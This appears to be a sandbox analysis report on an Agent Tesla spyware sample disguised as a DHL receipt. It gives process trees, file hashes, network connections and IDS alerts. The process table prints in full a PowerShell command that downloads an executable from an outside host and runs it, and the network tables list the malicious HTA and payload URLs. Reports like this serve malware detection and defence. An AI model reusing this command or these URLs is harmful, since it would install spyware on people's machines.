Field | Value
---|---
File name | dhl_receipt_receipt_sofia.mht
Full analysis | https://app.any.run/tasks/b4613e10-6c79-447f-8098-ee649282ef6f
Verdict | Malicious activity
Threats | Agent Tesla is spyware that collects information about its victims' actions by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold.
Analysis date | July 17, 2019, 11:32:25
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | text/plain
File info | ASCII text, with CRLF line terminators
MD5 | ABB4D022686FA1836E4B992F09AB2E72
SHA1 | A2D700F2A247F86D417C74CE7A5241FB92891890
SHA256 | 7BAD8B7FEB1C0022F724BB75B403740F2E60EA3343ADCF7F693DD4D65AA48BF9
SSDEEP | 6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ93rWNmdofTQNZ8vn:4Q0AQQYf2j3VTr93rsnfTQNav
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3364 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\dhl_receipt_receipt_sofia.mht | C:\Program Files\Internet Explorer\iexplore.exe | | explorer.exe | User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3596 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3788 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:137473 | C:\Program Files\Internet Explorer\iexplore.exe | | iexplore.exe | User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3356 | C:\Windows\System32\mshta.exe -Embedding | C:\Windows\System32\mshta.exe | | svchost.exe | User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
2176 | "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','%temp%\vnnv.exe'); Start '%temp%\vnnv.exe' | C:\Windows\System32\cmd.exe | — | mshta.exe | User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3044 | powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','C:\Users\admin\AppData\Local\Temp\vnnv.exe'); Start 'C:\Users\admin\AppData\Local\Temp\vnnv.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe | User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3268 | "C:\Users\admin\AppData\Local\Temp\vnnv.exe" | C:\Users\admin\AppData\Local\Temp\vnnv.exe | | powershell.exe | User: admin Integrity Level: MEDIUM Exit code: 0
3220 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe | User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1672 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\61346614\add.vbs" | C:\Windows\System32\WScript.exe | — | vnnv.exe | User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385
2916 | "C:\Users\admin\AppData\Local\Temp\61346614\brk.exe" snb=uiw | C:\Users\admin\AppData\Local\Temp\61346614\brk.exe | — | WScript.exe | User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 14, 4
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3364 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | — | —
3364 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | —
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | 0BECF2F991661E5C679568C79216E0BE | 01154F3F8A90378911859430F58B078503E58532B44AA57BB4F7122CB3735AFA
3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071720190718\index.dat | dat | FA65EB20A031F0927689F0C3A5E202D3 | 1A99DFFD91E1E8D0A4953EC51C2DE75D207B70DAB7E5DEDCFEA62110E5998A57
3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkE7F2.tmp | text | 5802850DF1DF6128C5AF93230BC19CD4 | 08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | 6CA9752A59010A03AB29B106C00DE194 | 0FC70631B554426848FC64AC3DCC4611775CA7B9F8BBC7921DF346B6D66C7FAD
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071720190718\index.dat | dat | 9A8553ED6380746E6B4D42F3682F5F66 | F801C74F3E6752756978B2FBB0F99879830A4F519A07A78F1929DD620A85613C
3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\wbkE698.tmp | text | 5802850DF1DF6128C5AF93230BC19CD4 | 08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8
3356 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\dhl_receipt_receipt_sofia[1].hta | html | FD9AF6BBDDBC3F7A7457FC9373DF5FCD | 030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SJ2B48XV\dhl_receipt_receipt_sofia[1].hta | html | FD9AF6BBDDBC3F7A7457FC9373DF5FCD | 030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3788 | iexplore.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
3356 | mshta.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
3044 | powershell.exe | GET | 200 | 103.1.208.220:80 | http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe | VN | executable | 1.50 Mb | suspicious |
3364 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3364 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3356 | mshta.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
3788 | iexplore.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
3044 | powershell.exe | 103.1.208.220:80 | jpf.edu.vn | CHT Compamy Ltd | VN | suspicious |
Domain | IP | Reputation
---|---|---
www.bing.com | 204.79.197.200 | whitelisted
elkom.express | 94.156.77.35 | suspicious
jpf.edu.vn | 103.1.208.220 | suspicious
PID | Process | Class | Message |
---|---|---|---|
3788 | iexplore.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of document.write % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of parseInt % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of unescape % Encoding |
3356 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3356 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3356 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
3356 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |